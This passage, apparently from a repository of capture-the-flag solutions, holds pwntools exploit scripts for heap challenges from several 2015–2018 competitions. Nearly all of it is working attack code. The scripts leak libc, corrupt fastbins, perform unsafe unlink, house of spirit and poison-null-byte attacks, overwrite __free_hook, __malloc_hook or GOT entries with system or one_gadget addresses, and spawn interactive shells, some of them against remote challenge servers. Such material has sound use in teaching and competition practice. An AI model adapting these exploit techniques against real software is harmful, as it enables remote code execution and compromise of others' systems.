24 | conn.recvuntil("note content:") 25 | conn.send(content) 26 | 27 | def delete(idx): 28 | menu(2) 29 | conn.recvuntil("delete?") 30 | conn.sendline(str(idx)) 31 | 32 | def list(): 33 | menu(3) 34 | 35 | def edit(idx, content): 36 | menu(4) 37 | conn.recvuntil("edit?") 38 | conn.sendline(str(idx)) 39 | conn.recvuntil("new content") 40 | conn.send(content) 41 | conn.recvuntil("Done") 42 | 43 | def expand(idx, expand_size, expand_content): 44 | menu(5) 45 | conn.recvuntil("expand?") 46 | conn.sendline(str(idx)) 47 | conn.recvuntil("expand?") 48 | conn.sendline(str(expand_size)) 49 | conn.recvuntil("want to expand") 50 | conn.send(expand_content) 51 | conn.recvuntil("Done") 52 | 53 | test_content = "a"*7 + "\n" 54 | 55 | # Libc leak 56 | add(0x100, test_content) 57 | add(0x100, "/bin/sh\x00\n") 58 | delete(1) 59 | add(0x100, test_content) 
60 | list() 61 | conn.recvuntil(test_content) 62 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 63 | #libc.address = libc_leak - 0x7f4a4f3a7b78 + 0x7f4a4efe3000 64 | libc.address = libc_leak - 0x7f4743e31b78 + 0x7f4743a6e000 65 | log.info("Libc leak: " + hex(libc_leak)) 66 | 67 | add(0x38, "a"*0x37 + "\n") # 3 68 | add(0x100, "b"*0xf9 + "\n") # 4 69 | 70 | fake_note = p64(0) + \ 71 | p64(0x20) + \ 72 | p64(0) + \ 73 | p64(0) + \ 74 | p64(libc.symbols['__free_hook']) 75 | 76 | add(0x100, "f"*0x90 + fake_note + "\n") # 5 77 | add(0x100, test_content) # 6 78 | delete(4) # b's inserted in freelist 79 | 80 | fake_note = "d"*8 + \ 81 | "e"*7 82 | expand(3, 0x100 - 0x38, "c"*0x16 + fake_note + "\n") 83 | edit(5, p64(libc.symbols['system']) + "\n") 84 | 85 | delete(1) 86 | 87 | conn.interactive() 88 | -------------------------------------------------------------------------------- /acebear-2018/memo_heap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./memo_heap" 7 | bin = ELF(file) 8 | 9 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def menu(ch): 15 | conn.recvuntil("Your choice: ") 16 | conn.sendline(str(ch)) 17 | 18 | def add(size, name = None): 19 | menu(1) 20 | conn.recvuntil("What is size of memo") 21 | conn.sendline(str(size)) 22 | conn.recvuntil("Name of memo: ") 23 | if size != 0: 24 | conn.send(name) 25 | conn.recvuntil("Done!") 26 | 27 | def edit(i, name = None, shell=False): 28 | menu(2) 29 | conn.recvuntil("Index of memo") 30 | conn.sendline(str(i)) 31 | if shell: 32 | return 33 | if name is not None: 34 | conn.recvuntil("New name") 35 | conn.send(name) 36 | conn.recvuntil("Done!") 37 | else: 38 | conn.recvuntil("Can not edit this memo") 39 | 40 | def show(i): 41 | menu(3) 42 | conn.recvuntil("Index of memo") 43 | 
conn.sendline(str(i)) 44 | conn.recvuntil("Name: ") 45 | 46 | def delete(i): 47 | menu(4) 48 | conn.recvuntil("Index of memo") 49 | conn.sendline(str(i)) 50 | conn.recvuntil("Done!") 51 | 52 | # Leaking libc 53 | add(0x80, "a") 54 | add(0x80, "b") 55 | delete(0) 56 | add(0x80, "a"*8) 57 | show(0) 58 | 59 | conn.recvn(8) 60 | 61 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 62 | libc.address = libc_leak - 0x7f7a36f98b78 + 0x7f7a36bd4000 63 | 64 | # Cleaning 65 | delete(0) 66 | delete(1) 67 | 68 | # Double free 69 | add(0) 70 | add(0) 71 | edit(0) 72 | delete(1) 73 | delete(0) 74 | 75 | add(0x10, p64(0)) # 0 76 | add(0x10, "a") # 1 77 | add(0x10, "b") # 2 78 | edit(0, "\xf0") 79 | 80 | # House of spirit 81 | payload = p64(0) + p64(0x70) 82 | payload = payload.ljust(0x70, "\x00") 83 | payload += p64(0) + p64(0x70) 84 | add(0x200, payload) # 3 85 | 86 | delete(2) 87 | 88 | # Fastbin corruption 89 | payload = p64(0) + p64(0x70) + p64(libc.symbols['__realloc_hook'] - 0x1b) 90 | edit(3, payload) 91 | 92 | add(0x60, "/bin/sh\x00") # 2 93 | add(0x60, "\x00"*(0x1b - 0x10) + p64(libc.symbols['system'])) 94 | 95 | edit(2, shell=True) 96 | 97 | log.info("Libc leak: " + hex(libc_leak)) 98 | 99 | conn.interactive() 100 | -------------------------------------------------------------------------------- /hitcon-2016/baby-heap-300/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.clear(arch = 'amd64') 4 | 5 | file = "./babyheap" 6 | 7 | bin = ELF(file) 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | 10 | 11 | conn = process(file) 12 | 13 | def new(size, content, name): 14 | conn.sendline("1") 15 | conn.recvuntil("Size :") 16 | conn.sendline(str(size)) 17 | conn.recvuntil("Content:") 18 | conn.send(content) 19 | conn.recvuntil("Name:") 20 | conn.send(name) 21 | conn.recvuntil("choice:") 22 | 23 | def exit(str): 24 | conn.sendline("4") 25 | conn.recvuntil("Y/n)") 26 | conn.send(str) 27 | 
conn.recvuntil("choice:") 28 | 29 | def delete(): 30 | conn.sendline("2") 31 | conn.recvuntil("choice:") 32 | 33 | def edit(content): 34 | conn.sendline("3") 35 | conn.recvuntil("Content:") 36 | conn.send(content) 37 | conn.recvuntil("choice:") 38 | 39 | payload = "n"*(0x1000 - 0x20) 40 | 41 | fake_chunk = p64(0) \ 42 | + p64(0x50) \ 43 | + "d"*16 44 | 45 | payload += fake_chunk 46 | 47 | exit(payload) 48 | 49 | fake_chunk = p64(0) \ 50 | + p64(0x21) 51 | 52 | new(0x80, fake_chunk, "a"*8) 53 | 54 | delete() 55 | 56 | fake_chunk = "q"*16 \ 57 | + p64(0) \ 58 | + p64(0x33) \ 59 | + p64(0x1000) \ 60 | + p64(0xcafecafe) \ 61 | + p64(bin.got['_exit']) # Gonna overwrite from this 62 | 63 | new(0x43, fake_chunk, "blah") 64 | 65 | # Gadgets 66 | ret_addr = 0x0000000000400711 67 | 68 | payload = p64(ret_addr) \ 69 | + p64(bin.symbols['__read_chk'] + 6) \ 70 | + p64(bin.symbols['puts'] + 6) \ 71 | + p64(ret_addr) \ 72 | + p64(bin.symbols['printf'] + 6) \ 73 | + p64(ret_addr) \ 74 | + p64(bin.symbols['read'] + 6) \ 75 | + p64(ret_addr) \ 76 | + p64(ret_addr) \ 77 | + p64(ret_addr) \ 78 | + p64(ret_addr) \ 79 | + p64(bin.symbols['printf']) 80 | 81 | edit(payload) 82 | 83 | fmtstr = "%9$s----" + p64(bin.got['free']) 84 | 85 | conn.send(fmtstr) 86 | 87 | free_addr = u64(conn.recvn(6) + "\x00\x00") 88 | 89 | system_addr = libc.symbols['system'] - libc.symbols['free'] + free_addr 90 | 91 | payload = payload[:len(payload)-8] 92 | payload += p64(system_addr) 93 | 94 | conn.recvuntil("choice:") 95 | conn.send("aaa") # atoi will get 3 96 | conn.recvuntil("Content:") 97 | conn.send(payload) 98 | 99 | conn.sendline("/bin/sh") 100 | 101 | conn.interactive() 102 | -------------------------------------------------------------------------------- /sharif-2018/t00p_secrets/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = 
"./t00p_secrets" 7 | 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | bin = ELF(file) 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def master_key(): 15 | conn.recvuntil("Enter your master") 16 | conn.sendline(p64(4283034714650536567) + \ 17 | p64(8243946171696569202) + \ 18 | p64(7454134929210039143)) 19 | 20 | def menu(choice): 21 | conn.recvuntil("6. Exit\n") 22 | conn.sendline(str(choice)) 23 | 24 | def c(idx, size, bin_str, body): 25 | menu(1) 26 | conn.recvuntil("secret idx: ") 27 | conn.sendline(str(idx)) 28 | conn.recvuntil("Enter secret body size: ") 29 | conn.sendline(str(size)) 30 | conn.recvuntil("binary(0)") 31 | conn.sendline(str(bin_str)) 32 | conn.recvuntil("secret body") 33 | conn.send(body) 34 | 35 | def d(idx): 36 | menu(2) 37 | conn.recvuntil("secret id") 38 | conn.sendline(str(idx)) 39 | 40 | def e(idx, bin_str, body): 41 | menu(3) 42 | conn.recvuntil("secret id") 43 | conn.sendline(str(idx)) 44 | conn.recvuntil("binary(0)") 45 | conn.sendline(str(bin_str)) 46 | conn.recvuntil("secret content") 47 | conn.send(body) 48 | 49 | def p(idx): 50 | menu(5) 51 | conn.recvuntil("secret id") 52 | conn.sendline(str(idx)) 53 | conn.recvuntil("content: ") 54 | 55 | master_key() 56 | 57 | secrets_addr = 0x6020B8 58 | 59 | # Leaking libc address 60 | c(0, 0x100, 0, "aa") 61 | c(1, 0x100, 0, "bb") 62 | d(0) 63 | c(0, 0x100, 0, "a"*8) 64 | p(0) 65 | conn.recvn(8) 66 | libc_leak = u64(conn.recvn(8)) 67 | libc.address = libc_leak - 0x7f562462cb78 + 0x7f5624268000 68 | d(0) 69 | d(1) 70 | 71 | # Cleaned up heap 72 | # Unsafe unlink 73 | 74 | c(0, 0xf8, 0, "aa") 75 | c(3, 0xf8, 0, "aa") 76 | c(4, 0xf8, 0, "aa") 77 | # Overwriting 4's prev_in_use_bit 78 | # Fake chunk 79 | payload = p64(0) + \ 80 | p64(0xf1) + \ 81 | p64(secrets_addr) + \ 82 | p64(secrets_addr + 8) 83 | payload = payload.ljust(0xf0, "\x00") 84 | payload += p64(0xf0) 85 | e(3, 1, payload) 86 | d(4) # Unlink 87 | 88 | # Now, secrets[3] points to secrets[0] 89 | 90 | def 
a_write(addr, data): 91 | e(3, 0, p64(addr)) 92 | e(0, 0, data) 93 | 94 | def a_read(addr): 95 | e(3, 0, p64(addr)) 96 | p(0) 97 | 98 | a_write(libc.symbols['__free_hook'], p64(libc.symbols['system'])) 99 | e(3, 1, "/bin/sh") 100 | d(3) 101 | 102 | log.info("Libc leak: " + hex(libc_leak)) 103 | 104 | conn.interactive() 105 | -------------------------------------------------------------------------------- /codegate-final-2015/heapster/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | #context.log_level = 'debug' 5 | 6 | libc_file = "libc-2.19.so" 7 | file = "./heapster" 8 | 9 | libc = ELF(libc_file) 10 | bin = ELF(file) 11 | 12 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), libc_file)} 13 | 14 | conn = process(file, env=env) 15 | gdb.attach(conn) 16 | 17 | def malloc(size): 18 | conn.recvuntil("cmd>> ") 19 | conn.sendline("0") 20 | conn.recvuntil("size>> ") 21 | conn.sendline(str(size)) 22 | conn.recvuntil("= ") 23 | return conn.recvline().strip() 24 | 25 | def realloc(addr, size, shell=True): 26 | conn.recvuntil("cmd>> ") 27 | conn.sendline("1") 28 | conn.recvuntil("addr>> ") 29 | conn.sendline(addr) 30 | conn.recvuntil("size>> ") 31 | conn.sendline(str(size)) 32 | if shell: 33 | return 34 | conn.recvuntil("= ") 35 | return conn.recvline().strip() 36 | 37 | def free(addr): 38 | conn.recvuntil("cmd>> ") 39 | conn.sendline("2") 40 | conn.recvuntil("addr>> ") 41 | conn.sendline(addr) 42 | 43 | def fill(addr, data): 44 | conn.recvuntil("cmd>> ") 45 | conn.sendline("3") 46 | conn.recvuntil("addr>> ") 47 | conn.sendline(addr) 48 | conn.recvuntil("data>> ") 49 | str = "" 50 | for ch in data: 51 | str += ch.encode('hex') + " " 52 | str = str.strip() 53 | conn.sendline(str) 54 | 55 | def dump(addr): 56 | conn.recvuntil("cmd>> ") 57 | conn.sendline("4") 58 | conn.recvuntil("addr>> ") 59 | conn.sendline(addr) 60 | data = conn.recvline().strip() 61 | data 
= data.replace(' ', '').decode('hex') 62 | return data 63 | 64 | # Libc leaking 65 | 66 | a = malloc(0x80) 67 | b = malloc(0x80) 68 | free(a) 69 | a = malloc(0x80) 70 | libc_leak = u64(dump(a)[0:6] + "\x00\x00") 71 | 72 | log.info(hex(libc_leak)) 73 | 74 | libc_base = libc_leak - 0x7ff44132a7b8 + 0x7ff440f69000 75 | #libc_base = libc_leak - 0x7f6281f67b78 + 0x7f6281ba3000 76 | # 0x7f73ac3497b8 77 | 78 | # Clearing 79 | free(a) 80 | free(b) 81 | 82 | # Fastbin dup - use after free 83 | 84 | a = malloc(0x80) 85 | b = malloc(0x80) 86 | c = malloc(0x60) 87 | free(c) 88 | realloc(a, 0x80) # Now can use c 89 | 90 | realloc_hook_chunk = libc_base + libc.symbols['__realloc_hook'] - 0x10 - 3 91 | fill(c, p64(realloc_hook_chunk).ljust(0x60, "\x00")) 92 | 93 | d = malloc(0x60) 94 | e = malloc(0x60) 95 | 96 | payload = "\x00"*3 + p64(libc_base + libc.symbols['system']) 97 | fill(e, payload.ljust(0x60, "\x00")) 98 | log.info(hex(libc_base)) 99 | fill(d, "/bin/sh".ljust(0x60, "\x00")) 100 | 101 | realloc(d, 0x60, shell=True) 102 | 103 | log.info("Libc leak: " + hex(libc_leak)) 104 | 105 | conn.interactive() 106 | -------------------------------------------------------------------------------- /meepwn-2018/house_of_card/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./house_of_card" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so")} 12 | 13 | #conn = gdb.debug(file, env=env) 14 | conn = remote("178.128.87.12", 31336) 15 | 16 | def menu(ch): 17 | conn.recvuntil("Quit\n") 18 | conn.sendline(str(ch)) 19 | 20 | """ 21 | read(name, 63 char) 22 | read(len) 23 | malloc(len) and read desc in it 24 | malloc(len + 69) and set structure 25 | free(desc) 26 | malloc(0x18) for node 27 | insert at end of list 28 
| """ 29 | def new(name, l, desc): 30 | menu(1) 31 | conn.recvuntil("Name") 32 | conn.send(name) 33 | conn.recvuntil("Len") 34 | conn.sendline(str(l)) 35 | conn.recvuntil("Description") 36 | conn.send(desc) 37 | 38 | """ 39 | read(idx) 40 | read(name, 64 char) 41 | read(len) 42 | if len <= original_len: 43 | read(desc, len char) 44 | else 45 | realloc(original_note, len + 68) 46 | read(desc, len + 68 char) -- overflow 47 | """ 48 | def edit(idx, name, l, desc, menu_call=True): 49 | if menu_call: 50 | menu(2) 51 | conn.recvuntil("Back.") 52 | conn.sendline(str(idx)) 53 | conn.recvuntil("New name") 54 | conn.send(name) 55 | conn.recvuntil("Len?") 56 | conn.sendline(str(l)) 57 | conn.send(desc) 58 | 59 | """ 60 | read(idx) 61 | free(note) 62 | free(node) 63 | """ 64 | def delete(idx): 65 | menu(3) 66 | conn.recvuntil("Back.") 67 | conn.sendline(str(idx)) 68 | conn.recvuntil("Done") 69 | 70 | # Libc leak 71 | new("vampire\n", 0x100, "desc1\n") 72 | new("vampire2\n", 0x100, "desc2\n") 73 | new("vampire3\n", 0x100, "desc3\n") 74 | menu(2) 75 | conn.recvuntil("desc3\x00\x00\x00") 76 | libc_leak = u64(conn.recvn(8)) 77 | #libc.address = libc_leak - 0x7f0ba43d4c78 + 0x7f0ba4010000 78 | libc.address = libc_leak - 0x7efd6c656c58 + 0x7efd6c295000 79 | 80 | edit(1, "vampire\n", 0x100, "desc1\n", menu_call=False) 81 | 82 | log.info("Libc base : " + hex(libc.address)) 83 | 84 | # Clearing up heap 85 | delete(1) 86 | delete(1) 87 | delete(1) 88 | new("vampire\n", 0x400, "desc1\n") 89 | delete(1) # consolidate 90 | 91 | # Only the first chunk in fastbin, can be ignored since it'll 92 | # pop out the next malloc 93 | 94 | # Overwriting node_ptr 95 | new("vampire\n", 0x100, "desc1\n") 96 | # Clear up the unsorted bin 97 | for i in range(8): 98 | new("vampire%d\n" % i, 0x110, "desc2\n") 99 | new("vampire10\n", 0x100, "desc10\n") 100 | #delete(10) 101 | payload = "d"*(0xd0 + 60) + p64(libc.symbols['__realloc_hook']) + "\n" 102 | edit(1, "vampire\n", 0x101, payload) 103 | one_gadget = 
libc.address + 0xce0e1 104 | edit(10, p64(one_gadget) + "\n", 0x100, "ls -l\n") 105 | conn.interactive() 106 | -------------------------------------------------------------------------------- /insomni-hack-finals-18/yanc/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./yanc" 7 | bin = ELF(file) 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | 10 | conn = process(file) 11 | #gdb.attach(conn) 12 | 13 | def menu(ch): 14 | conn.recvuntil("quit") 15 | conn.sendline(str(ch)) 16 | 17 | def add(note, title, shell=False): 18 | menu(1) 19 | conn.recvuntil("Enter note : ") 20 | conn.send(note) 21 | if shell: 22 | return 23 | conn.recvuntil("Enter title : ") 24 | conn.send(title) 25 | 26 | def delete(idx): 27 | menu(2) 28 | conn.recvuntil("Which one :") 29 | conn.sendline(str(idx)) 30 | 31 | def view(): 32 | menu(3) 33 | 34 | # Libc leak: 35 | add("note2\n", "title2\n") 36 | add("note3\n", "title3\n") 37 | add("note1" + "a"*0x90 + "\n", "title1\n") 38 | add("note4\n", "title4\n") 39 | delete(2) 40 | delete(0) 41 | add("note2\n", "a"*0x20 + "\x50") 42 | view() 43 | conn.recvuntil("Note : ") 44 | conn.recvuntil("Note : ") 45 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 46 | 47 | libc.address = libc_leak - 0x7fbe3ce99b78 + 0x7fbe3cad5000 48 | 49 | # Clearing 50 | delete(0) 51 | add("note2\n", "a"*0x20 + "\x30") 52 | delete(0) 53 | delete(1) 54 | delete(3) 55 | add("a"*0xb0 + "\n", "title\n") 56 | delete(0) 57 | 58 | # pwning 59 | add("note1" + "a"*0x60 + "\n", "title1\n") 60 | add("note2" + "a"*0x60 + "\n", "title2\n") 61 | add("note3" + "a"*0x60 + "\n", "title3\n") 62 | delete(0) 63 | add("note1" + "a"*0x60 + "\n", "a"*0x20 + "\x10") 64 | delete(0) 65 | delete(2) 66 | delete(1) 67 | 68 | payload = p64(libc.symbols['__malloc_hook'] - 0x23) 69 | payload = payload.ljust(0x60, "\x00") + "\n" 70 | add(payload, 
"title1\n") 71 | add("a"*0x60 + "\n", "title2\n") 72 | add("a"*0x60 + "\n", "title2\n") 73 | 74 | """ 75 | 0x4526a execve("/bin/sh", rsp+0x30, environ) 76 | constraints: 77 | [rsp+0x30] == NULL 78 | 79 | 0xcd0f3 execve("/bin/sh", rcx, r12) 80 | constraints: 81 | [rcx] == NULL || rcx == NULL 82 | [r12] == NULL || r12 == NULL 83 | 84 | 0xcd1c8 execve("/bin/sh", rax, r12) 85 | constraints: 86 | [rax] == NULL || rax == NULL 87 | [r12] == NULL || r12 == NULL 88 | 89 | 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 90 | constraints: 91 | [rsp+0x50] == NULL 92 | 93 | 0xf1147 execve("/bin/sh", rsp+0x70, environ) 94 | constraints: 95 | [rsp+0x70] == NULL 96 | 97 | 0xf66f0 execve("/bin/sh", rcx, [rbp-0xf8]) 98 | constraints: 99 | [rcx] == NULL || rcx == NULL 100 | [[rbp-0xf8]] == NULL || [rbp-0xf8] == NULL 101 | """ 102 | 103 | one_gadget_addr = libc.address + 0xf02a4 104 | payload = "\x00"*0x13 + p64(one_gadget_addr) 105 | payload = payload.ljust(0x60, "\x00") + "\n" 106 | add(payload, "title3\n") 107 | add("a\n", "whoami\n", shell=True) 108 | 109 | log.info("Libc leak: " + hex(libc_leak)) 110 | 111 | conn.interactive() 112 | -------------------------------------------------------------------------------- /asis-finals-2018/mem0/exploit-16.04.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | context.log_level = 'debug' 5 | 6 | file = "./memo" 7 | bin = ELF("./memo") 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | conn = process(file) 10 | #gdb.attach(conn) 11 | 12 | indexes = [0]*10 13 | 14 | def menu(ch): 15 | conn.recvuntil("5. 
Exit") 16 | conn.sendline(str(ch)) 17 | 18 | def create(size, content): 19 | menu(1) 20 | conn.recvuntil("memo size: ") 21 | conn.sendline(str(size)) 22 | conn.recvuntil("content: ") 23 | conn.send(content) 24 | for i in range(10): 25 | if indexes[i] == 0: 26 | indexes[i] = 1 27 | return i 28 | assert(False) 29 | 30 | def edit(idx, content): 31 | menu(2) 32 | conn.recvuntil("idx: ") 33 | conn.sendline(str(idx)) 34 | conn.recvuntil("content: ") 35 | conn.send(content) 36 | 37 | def delete(idx): 38 | menu(3) 39 | conn.recvuntil("idx: ") 40 | conn.sendline(str(idx)) 41 | indexes[idx] = 0 42 | 43 | def show(idx): 44 | menu(4) 45 | conn.recvuntil("idx: ") 46 | conn.sendline(str(idx)) 47 | conn.recvuntil("content: ") 48 | 49 | # Overlapping chunks 50 | id1 = create(0x100, "a\n") 51 | id2 = create(0x98, "b\n") 52 | id3 = create(0xf0, "c\n") 53 | id4 = create(0xf0, "d\n") 54 | 55 | delete(id1) 56 | edit(id2, "\x00"*0x90 + p64(0x110 + 0xa0)) 57 | delete(id3) 58 | 59 | # A big chunk is freed, id2 is part of that 60 | 61 | # Leaking libc 62 | id5 = create(0x100, "a\n") 63 | show(id2) 64 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 65 | libc.address = libc_leak - 0x7f5fcfd0fb78 + 0x7f5fcf94b000 66 | delete(id5) 67 | 68 | # Cleanup 69 | delete(id4) 70 | 71 | # Fastbin corruption 72 | id1 = create(0x100, "a\n") 73 | id2 = create(0x68, "b\n") 74 | id3 = create(0xf0, "c\n") 75 | id4 = create(0xf0, "d\n") 76 | delete(id1) 77 | edit(id2, "\x00"*0x60 + p64(0x110 + 0x70)) 78 | delete(id3) 79 | delete(id2) 80 | payload = "\x00"*0x100 + \ 81 | p64(0) + p64(0x71) + \ 82 | p64(libc.symbols['__malloc_hook'] - 0x23) + \ 83 | "\x00"*0x58 + \ 84 | p64(0) + p64(0x71) 85 | id5 = create(0x270, payload + "\n") 86 | id6 = create(0x60, "a\n") 87 | 88 | """ 89 | 0x45216 execve("/bin/sh", rsp+0x30, environ) 90 | constraints: 91 | rax == NULL 92 | 93 | 0x4526a execve("/bin/sh", rsp+0x30, environ) 94 | constraints: 95 | [rsp+0x30] == NULL 96 | 97 | 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 98 | 
constraints: 99 | [rsp+0x50] == NULL 100 | 101 | 0xf1147 execve("/bin/sh", rsp+0x70, environ) 102 | constraints: 103 | [rsp+0x70] == NULL 104 | """ 105 | payload = "\x00"*0x13 + p64(libc.address + 0xf02a4) 106 | id7 = create(0x60, payload + "\n") 107 | 108 | # rip control 109 | delete(id5) 110 | # leads to error condition which calls strdup and hence malloc! 111 | delete(id6) 112 | 113 | log.info("Libc leak: " + hex(libc_leak)) 114 | 115 | conn.interactive() 116 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | 5 | file = "./sapeloshop" 6 | 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("libc-2.23.so") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.23.so.")} 12 | 13 | conn = remote("sapeloshop.teaser.insomnihack.ch", 80) 14 | #conn = process(file, env=env) 15 | #gdb.attach(conn) 16 | 17 | def html(url, content): 18 | r = "" 19 | if content is None: 20 | r += "GET" 21 | else: 22 | r += "POST" 23 | r += " /" + url + " HTTP/1.1\r\n" 24 | r += "Connection: keep-alive\r\n" 25 | if content is not None: 26 | r += "Content-Length: " + str(len(content)) + "\r\n" 27 | r += "\r\n" 28 | if content is not None: 29 | r += content 30 | return r 31 | 32 | def parse(num): 33 | """Returns the item contents depending on num items""" 34 | conn.recvuntil("Content-Length") 35 | conn.recvuntil("\r\n\r\n") 36 | items = [] 37 | for i in range(num): 38 | conn.recvuntil("class=\"row\">
> ") 20 | conn.sendline(choice) 21 | 22 | def create_marimo(name, profile): 23 | conn.recvuntil("name? (0x10)") 24 | conn.sendline(name) 25 | conn.recvuntil("'s profile.") 26 | conn.sendline(profile) 27 | conn.recvuntil(">> ") 28 | 29 | def create(name, profile): 30 | menu("show me the marimo") 31 | create_marimo(name, profile) 32 | 33 | def buy(name, profile, size): 34 | menu("B") 35 | conn.recvuntil("want for Marimo? (cm)") 36 | conn.sendline(str(size)) 37 | conn.recvuntil("Give me money") 38 | conn.sendline("P") 39 | create_marimo(name, profile) 40 | 41 | def sell(idx): 42 | menu("S") 43 | conn.recvuntil("sell? (number)") 44 | conn.sendline(str(idx)) 45 | conn.recvuntil("un away ?") 46 | conn.sendline("S") 47 | conn.recvuntil("good bye marimo T-T") 48 | 49 | def view(idx): 50 | menu("V") 51 | conn.recvuntil("Select number or [B]ack") 52 | conn.sendline(str(idx)) 53 | 54 | def back(): 55 | conn.recvuntil("[M]odify /") 56 | conn.sendline("B") 57 | 58 | def modify(profile): 59 | conn.recvuntil("[M]odify /") 60 | conn.sendline("M") 61 | conn.recvuntil("new profile") 62 | conn.sendline(profile) 63 | 64 | create("name1", "profile1") 65 | create("name2", "profile2") 66 | 67 | sleep(2) 68 | 69 | def a_read(addr): 70 | view(0) 71 | payload = "a"*8*4 + \ 72 | p64(0) + \ 73 | p64(0x21) + \ 74 | p32(0xffff) + p32(0xaaaa) + \ 75 | p64(0) + \ 76 | p64(addr) 77 | modify(payload) 78 | back() 79 | view(1) 80 | conn.recvuntil("profile : ") 81 | 82 | def a_write(addr, data): 83 | view(0) 84 | payload = "a"*8*4 + \ 85 | p64(0) + \ 86 | p64(0x21) + \ 87 | p32(0xffff) + p32(0xaaaa) + \ 88 | p64(0) + \ 89 | p64(addr) 90 | modify(payload) 91 | back() 92 | view(1) 93 | modify(data) 94 | back() 95 | 96 | a_read(bin.got['puts']) 97 | puts_addr = u64(conn.recvn(6) + "\x00\x00") 98 | back() 99 | 100 | system_addr = libc.symbols['system'] - libc.symbols['puts'] + puts_addr 101 | bin_sh_addr = next(libc.search("/bin/sh")) - libc.symbols['puts'] + puts_addr 102 | 103 | rip = 0xdeadbeef 104 | 
a_write(bin.got['strcmp'], p64(system_addr)[:-1]) 105 | 106 | conn.sendline("/bin/sh") 107 | #create("name3", "profile2") 108 | 109 | log.info("System addr: " + hex(system_addr)) 110 | 111 | conn.interactive() 112 | -------------------------------------------------------------------------------- /rctf-2018/babyheap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./babyheap" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | #conn = process(file, env=env) 14 | conn = remote("babyheap.2018.teamrois.cn", 3154) 15 | #gdb.attach(conn) 16 | 17 | def menu(ch): 18 | conn.recvuntil("choice:") 19 | conn.sendline(str(ch)) 20 | 21 | def alloc(size, content, shell=False): 22 | menu(1) 23 | conn.recvuntil("size") 24 | conn.sendline(str(size)) 25 | if shell: 26 | return 27 | conn.recvuntil("content") 28 | conn.send(content) 29 | 30 | def show(idx): 31 | menu(2) 32 | conn.recvuntil("index") 33 | conn.sendline(str(idx)) 34 | 35 | def delete(idx): 36 | menu(3) 37 | conn.recvuntil("index") 38 | conn.sendline(str(idx)) 39 | 40 | # Poison null byte - Leak libc 41 | alloc(0x58, "a\n") # 0 42 | payload = "\x00"*0xf0 + p64(0x100) 43 | alloc(0x100, payload + "\n") # 1 44 | alloc(0x90, "a\n") # 2 45 | alloc(0x100, "a\n") # 3 46 | delete(1) 47 | delete(0) 48 | alloc(0x58, "a"*0x58) # 0 49 | alloc(0x40, "a\n") # 1 50 | alloc(0x90, "b\n") # 4 51 | delete(1) 52 | delete(3) 53 | delete(2) 54 | 55 | # Sacred chunk in 4 56 | alloc(0x40, "a\n") # 1 57 | alloc(0xb0, "a\n") # 2 = 4 actually 58 | alloc(0xb0, "a\n") # 3 59 | delete(2) 60 | show(4) 61 | conn.recvuntil("content: ") 62 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 63 | #libc.address = libc_leak - 0x7f214103cb78 + 0x7f2140c78000 64 | 
